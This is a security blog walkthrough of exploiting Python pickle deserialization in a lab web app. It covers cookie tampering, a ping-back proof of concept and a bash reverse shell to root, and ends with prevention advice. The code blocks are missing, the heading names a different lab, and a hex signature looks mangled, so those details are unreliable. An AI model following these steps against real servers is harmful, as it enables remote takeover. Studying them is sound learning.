Exploiting Insecure Deserialization bugs
found in the Wild (Python Pickles)

Haystack - Hack The Box Machine

This blog post was written by Ian Musyoka.

Introduction

Serialization is the process of converting an object into a byte stream so that It can be loaded elsewhere or stored in a database or file.

Python is used in building applications and in our case today we’ll be exploiting a web application that’s written in Django. In the python programming language, the libraries used to serialize and deserialize data are pickle and cpickle. In our case, we’ll be exploiting pickle.

We’ll be calling the methods loads and dumps which are inbuilt pickle functions to both serialize and deserialize data.

HOW DOES THE VULNERABILITY OCCUR

Whenever unsanitized and invalidated user input finds its way to a loads pickle function it will cause the program to trigger malicious payload which is probably planted by an attacker and this may lead to remote code execution or commonly known as RCE which in turn may lead to data breaches or complete system takeover by the attacker.

ATTACK VECTORS THAT ADVERSARIES USE

The most common attack scenario leading to remote code execution would be to trust pickled data transmitted over a network that is unencrypted (Running HTTP). If the network is unencrypted, the data could possibly be modified over the wire.

Another attack scenario is when an attacker can access and modify a stored pickle file from a cache, file system, or database.

Web application deserializes user input provided by the user or attacker through a parameter.

All of the above cases may lead to a complete system compromise.

A SIMPLE PYTHON PROGRAM EXPLAINING PICKLING (CLIENT.PY)

Let’s start by creating a simple client application that takes data in a dictionary format and serializes the data.

The source to the client application is shown below #!/usr/bin/env python3 from base64.

 

 

On saving the script and executing it we get the output in the byte format.

 

Normally the data is saved in base64 encoded format since some of the characters it has are not in a printable format. So I added the functionality in my python script so that the serialized data is base64 encoded after being generated.

 

 

After executing the script we get the generated serialized data in a base64 encoded format as shown below:

This program by itself isn’t malicious but when combined with other libraries such as OS or by using built-in functions like exec or eval, it may lead to remote code execution. A SIMPLE PYTHON PROGRAM EXPLAINING PICKLING (SERVER.PY).

Next, we are creating the server application. This is the application that will deserialize the object to give us back the original data.

The server takes the serialized object from a file and deserializes it to give us back the original object.

The source code to the server application is shown below:

 

Next, I generated serialized data which is encoded with base64 and saved it to a file called pickled_data as shown below:

 

Next, I ran the server application and we see we get back the original data that we had pickled earlier.

 

 

The signature for a python serialized object is gASV. That’s how you can identify an encoded payload. If it is in hexadecimal, it would be c28004c29526000000000000.

As long as unsanitized and unvalidated user input is passed to pickle.loads() or loads function it may lead to code execution and once an attacker has code executing on a system the next step is to get a shell.

For proof of concept, we’ll be using a lab from TryHackMe called Unbacked Pie.

The first step is to do the initial recon using Nmap which is a utility for network exploration or security auditing. It supports ping scanning which determines which hosts are up, many port scanning techniques, version detection (determines service protocols and application versions listening behind ports), and TCP/IP fingerprinting (remote host OS or device identification). Once Nmap scan is completed, we see that only one port comes back open:

Port 5003

 

 

 

 

 

 

Looking through the fingerprint information, it looks like It’s running an HTTP service. I opened up the web application using Mozilla Firefox and looking at the screenshot below we get a standard web application.

 

The next logical step is to do some web application enumeration like brute-forcing for potential sub-domains, running gobuster tool, testing each parameter that allows user input for various vulnerabilities like SQL Injection, Cross-Site Scripting, Server Side Requests forgeries, Command Injection, Local File Inclusion, etc. But today we’ll be focusing on areas in the web application that allows for user input.

First I intercepted the request using burpsuite. Looking at the request we have already been assigned a Cross-Site Request Forgery Token and this will prevent Cross-Site Request Forgery attacks on the web application.

 

But going back to the web application we were allowed to search for content.

 

I began by searching for number 1 and intercepted the request using burpsuite and send it to the repeater tab.

 

After forwarding the query, the server assigns us another cookie and this time it’s called search_cookie.

 

Looking at the cookie, it appears to be base64 encoded and looks like pickles serialized object since it begins with the string gASV.

I copied the string and tried deserializing it using a python command line.

 

We get back the string 1 which we had sent to the server. Next, I tried querying using my name Muskoka. Looking at the screenshot below we get a different base64 encoded serialized object.

 

On decoding and deserializing the string we get back my name Muskoka.

 

Sweet! Now we are confident that the application is just serializing the data given by the user and storing the serialized object in a cookie called search_cookie.

 

Since we have full control of the serialized object; what if we change it and put a weaponized object?

I created a script that will spawn a new process on the victim’s machine and ping our box. This is the first proof of concept that I normally use because reverse shells sometimes don’t work due to firewall implementations.

The source code of the exploit is shown below:

 

On executing the exploit it generates a base64 encoded serialized payload which I added to my cookie.

 

 

Next, I set up a tcpdump listener to listen for incoming ICMP packets.

 

The requests are being sent and upon checking my box, I got the pings.

 

 

 

Sweet! We have a command injection on the server. The next step is to try and get a reverse shell on the system. I used a bash reverse shell since it’s the most reliable one.

 

I again generated the payload and copied it to the cookie argument.

 

Next, I set up a Netcat listener on port 9001 because I had specified this port on the payload.

 

I forwarded the payload using burpsuite.

 

Going back to my Netcat listener I got a root shell on the box.

 

 

 

REVIEWING THE SOURCE CODE

After getting a shell on the server I wanted to check and see how the code had been implemented and upon looking at the source code we see the vulnerable function.

 

The function seems to be performing a pickle.loads() on the cookie used by the web application without doing any sanitization whatsoever.

 

Also, we get to see how the search_cookie is generated. The web application gets the query input from the user and serializes the query and set’s it up as a cookie.

 

That’s how the vulnerability occurs. I created a short python script that automates the entire process of creating a pickled payload and submitting it to the webserver and giving us a shell on the system. The source code for the exploit is shown below.

 

 

Let’s test the exploit.

 

 

The exploit works perfectly!

Prevention

  1. Validation and verification of data to make sure user input meets certain criteria. Use whitelisting of expected types/data.
  2. Isolate and run deserialized code in a low privileged environment.
  3. In scenarios where the pickle data is stored, review file system permission to ensure protected access to the data.
  4. In cases where a secure connection is not possible any alteration in pickle can be verified using a cryptographic signature. Pickle can be signed before storage or transmission and its signature can be verified before loading it on the receiver side.

References

https://medium.com/@shibinbshaji007/using-pythons-pickling-to-explain-insecure-deserialization-5837d2328466
https://dan.lousqui.fr/explaining-and-exploiting-deserialization-vulnerability-with-python-en.html
https://www.synopsys.com/blogs/software-security/python-pickling/
https://frichetten.com/blog/escalating-deserialization-attacks-python/

 

Disclaimer

The MacroSec blogs are solely for informational and educational purposes. Any actions and or activities related to the material contained within this website are solely your responsibility. The misuse of the information on this website can result in criminal charges brought against the persons in question. The authors and MacroSec will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.